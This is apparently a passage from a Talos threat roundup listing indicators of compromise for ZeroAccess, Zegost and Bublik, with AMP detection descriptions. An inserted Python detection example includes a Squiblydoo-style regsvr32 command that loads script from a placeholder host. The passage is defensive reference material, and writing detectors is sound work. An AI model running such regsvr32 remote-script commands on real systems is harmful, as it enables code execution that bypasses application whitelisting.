%ProgramFiles%\Windows Mail\Microsoft Windows DirectX.bat 4
%ProgramFiles%\Windows Mail\Microsoft Windows DirectX.vbs 4
%ProgramFiles%\Windows Mail\msvcr120.dll 4
%ProgramFiles%\Windows Mail\system32.exe 4
%ProgramFiles%\Windows Mail\wfhack.vbs 4
%ProgramFiles%\Windows Mail\neon32.bat 4
%ProgramFiles%\Windows Mail\neon32.exe 4
%ProgramFiles%\Windows Mail\neon32.vbs 4
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows DirectX.lnk 3
%ProgramFiles%\x86 2
%ProgramFiles%\x86\msvcr120.dll 1
%ProgramFiles%\x86\neon32.bat 1
%ProgramFiles%\x86\neon32.exe 1
%ProgramFiles%\x86\neon32.vbs 1
%ProgramFiles%\x86\system32.exe 1
%ProgramFiles%\x86\wfhack.vbs 1
%ProgramFiles%\x86\x86.bat 1
%ProgramFiles%\x86\x86.vbs 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\system32.lnk 1

File Hashes

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid



MITRE ATT&CK


Win.Packed.ZeroAccess-9859480-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 40 samples
Registry Keys | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: Start
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: DeleteFlag
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: DeleteFlag
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: DeleteFlag
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BROWSER
Value Name: Start
40
<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32
Value Name: ThreadingModel
40
<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32 40
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
40
<HKLM>\SOFTWARE\CLASSES\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\INPROCSERVER32 40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Type
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: ErrorControl
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: Type
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: ErrorControl
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: Type
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: ErrorControl
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: DeleteFlag
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Type
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: ErrorControl
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Type
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: ErrorControl
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000010
Value Name: PackedCatalogItem
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000009
Value Name: PackedCatalogItem
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000008
Value Name: PackedCatalogItem
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000007
Value Name: PackedCatalogItem
40
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000006
Value Name: PackedCatalogItem
40
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
j[.]maxmind[.]com 40
Files and/or directories created | Occurrences
\$Recycle.Bin\S-1-5-18 40
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f 40
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\@ 40
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\L 40
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\U 40
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\n 40
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f 40
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\@ 40
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\L 40
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\U 40
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\n 40
\$Recycle.Bin\S-1-5-21-1160359183-2529320614-3255788068-500\$bc873181c718236380cd637b8be3cfa0\@ 39
\$Recycle.Bin\S-1-5-21-1160359183-2529320614-3255788068-500\$bc873181c718236380cd637b8be3cfa0\n 39

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Zegost-9860024-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Registry Keys | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BEEP
Value Name: Beep
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BEEP
Value Name: svcname
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
19
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ConnectGroup
16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorPath
6
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\C7NKESBL\PARAMETERS 4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SVCHOST
Value Name: C7nkESBl
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\C7NKESBL\PARAMETERS
Value Name: ServiceDll
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUDXEJRG\PARAMETERS 4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SVCHOST
Value Name: FUdXeJRG
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FUDXEJRG\PARAMETERS
Value Name: ServiceDll
4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDDJGH2\PARAMETERS 3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SVCHOST
Value Name: WPDdjGH2
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WPDDJGH2\PARAMETERS
Value Name: ServiceDll
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\J6Y8MMV2\PARAMETERS 3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SVCHOST
Value Name: J6Y8mmV2
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\M3I1XBDE\PARAMETERS 3
Mutexes Occurrences
Global\<random guid> 19
<random, matching '[a-zA-Z0-9]{6}'>.pic 19
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
157[.]122[.]62[.]205 3
183[.]236[.]2[.]18 3
27[.]40[.]253[.]131 3
59[.]42[.]71[.]178 2
14[.]210[.]95[.]203 2
59[.]35[.]32[.]87 1
14[.]113[.]128[.]7 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
a6657457[.]3322[.]org 3
ahai22680[.]3322[.]org 2
xiaoyu9633[.]3322[.]org 2
425900290[.]3322[.]org 2
a4114325[.]6600[.]org 2
a846578461[.]gicp[.]net 1
a616713144[.]3322[.]org 1
aaxaa11[.]3322[.]org 1
woai1184661657[.]gicp[.]net 1
wqvb137110[.]3322[.]org 1
aaa520520[.]3322[.]org 1
mojun1688[.]3322[.]org 1
a759112398[.]3322[.]org 1
Files and/or directories created Occurrences
%ProgramFiles(x86)%\MSN 19
%TEMP%\C_Program360.tmp 19
%SystemRoot%\SysWOW64\<random, matching '[a-zA-Z0-9]{6}'>.pic 19
%System32%\<random, matching '[a-zA-Z0-9]{6}'>.pic 18

File Hashes

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Bublik-9859726-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST 25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\LAYERS 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\DOMAINPROFILE\AUTHORIZEDAPPLICATIONS\LIST 25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\LAYERS
Value Name: C:\Windows\SysWOW64\wmpdl64.exe
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\SysWOW64\wmpdl64.exe
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\DOMAINPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\SysWOW64\wmpdl64.exe
13
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Media Download
13
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\LAYERS
Value Name: C:\Windows\SysWOW64\wmpdn64.exe
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\SysWOW64\wmpdn64.exe
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\DOMAINPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\SysWOW64\wmpdn64.exe
7
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Media Manager
7
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\LAYERS
Value Name: C:\Windows\SysWOW64\igfxtc64.exe
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\SysWOW64\igfxtc64.exe
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\DOMAINPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\SysWOW64\igfxtc64.exe
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Intel Task Control
5
Mutexes Occurrences
muipcdraotse 25
V8x 13
S3xY! 12
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
66[.]128[.]53[.]179 25
204[.]11[.]237[.]59 25
157[.]240[.]2[.]35 5
104[.]21[.]57[.]186 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
jmp-53-90-02[.]level7-co2-as86409[.]su 13
ptr-55-98-06[.]level7-co2-as86409[.]su 13
jmp-53-75-05[.]level6-co2-as85026[.]su 12
ptr-53-77-09[.]level6-co2-as85026[.]su 10
nat93-162[.]level14-c01-as86179[.]su 6
nat04-148[.]level13-c01-as50213[.]su 5
nat82-145[.]level13-c01-as50213[.]su 4
nat103-142[.]level13-c01-as50213[.]su 3
nat113-170[.]level14-c01-as86179[.]su 3
nat08-155[.]level14-c01-as86179[.]su 3
nat3[.]level14-c01-as92013[.]su 1
Files and/or directories created Occurrences
\Autorun.inf 25
E:\Autorun.inf 25
E:\~Restore.{645FF040-5081-101B-9F08-00AA002F954E} 25
E:\~Restore.{645FF040-5081-101B-9F08-00AA002F954E}\res-p0391726.id 13
\~Restore.{645FF040-5081-101B-9F08-00AA002F954E}\res-p0391726.id 13
%SystemRoot%\SysWOW64\wmpdl64.exe 13
E:\~Restore.{645FF040-5081-101B-9F08-00AA002F954E}\res-p3950610.id 12
\~Restore.{645FF040-5081-101B-9F08-00AA002F954E}\res-p3950610.id 12
%SystemRoot%\SysWOW64\wmpdn64.exe 7
%SystemRoot%\SysWOW64\igfxtc64.exe 5

File Hashes
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (15802)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (9224)
A PowerShell command with a very long command line argument, which may indicate an obfuscated script, has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
A Microsoft Office process has started a windows utility. - (1655)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many different malware campaigns and families.
Crystalbit-Apple DLL double hijack detected - (1052)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a DLL double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and, in some cases, spyware deployment.
Dealply adware detected - (465)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Squiblydoo application whitelist bypass attempt detected. - (444)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
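The following Python is an added example, not code from the Talos post or from AMP, showing how the three behaviors described above (an Office process starting a Windows utility, an excessively long PowerShell command line, and regsvr32.exe loading script content from a remote server) can be expressed as checks over process-creation telemetry. It also flags the encoded-command form of PowerShell, which is what usually makes such command lines long; that check goes slightly beyond the text. The event field names follow the Sysmon Event ID 1 layout, and the process-name lists, the 1000-character threshold, and the sample events are all assumptions constructed for this example.

```python
"""Toy detector for three AMP exploit-prevention behaviors over constructed
process-creation events (Sysmon Event ID 1 style dicts). Added example only."""
import re

# Process-name lists are assumptions; extend them to match the environment.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
WINDOWS_UTILITIES = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                     "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Assumed threshold; baseline real command-line lengths before tuning it.
LONG_COMMAND_THRESHOLD = 1000
# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_RE = re.compile(r"\s-e(?:c|nc|ncodedcommand)?\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path):
    """Lower-cased file name from a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def powershell_suspicious(cmdline):
    """Long or encoded PowerShell invocation, as the AMP rule above describes."""
    return len(cmdline) >= LONG_COMMAND_THRESHOLD or bool(ENCODED_RE.search(cmdline))


def classify(event):
    """Return the list of alert names that apply to one process-creation event."""
    alerts = []
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")

    if parent in OFFICE_PARENTS and image in WINDOWS_UTILITIES:
        alerts.append("office_spawned_windows_utility")
    if image in POWERSHELL_IMAGES and powershell_suspicious(cmdline):
        alerts.append("excessively_long_or_encoded_powershell")
    # regsvr32 fetching its script content over HTTP(S): the Squiblydoo pattern.
    if image == "regsvr32.exe" and URL_RE.search(cmdline):
        alerts.append("regsvr32_remote_script")
    return alerts


def scan(events):
    """Map EventId -> alerts for every event that triggered at least one check."""
    findings = {}
    for event in events:
        alerts = classify(event)
        if alerts:
            findings[event["EventId"]] = alerts
    return findings


# Constructed sample telemetry (not from the Talos data); example.invalid is a placeholder.
SAMPLE_EVENTS = [
    {"EventId": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"EventId": 2,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -EncodedCommand " + "A" * 1500},
    {"EventId": 3,
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /i:http://example.invalid/x.sct scrobj.dll"},
    {"EventId": 4,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},
    {"EventId": 5,
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"},
]

if __name__ == "__main__":
    for event_id, alerts in scan(SAMPLE_EVENTS).items():
        print(event_id, alerts)
```

Events 4 and 5 are benign look-alikes (an ordinary PowerShell command and a local DLL registration) and produce no alert, which is the property to preserve when tuning the lists and threshold against real telemetry.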
Kovter injection detected - (430)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Cobalt Strike activity detected - (184)
Cobalt Strike is a tool used by both penetration testers and malicious actors. It has been observed being used to deliver Ryuk ransomware and other payloads.
Gamarue malware detected - (107)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
CVE-2019-0708 detected - (93)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.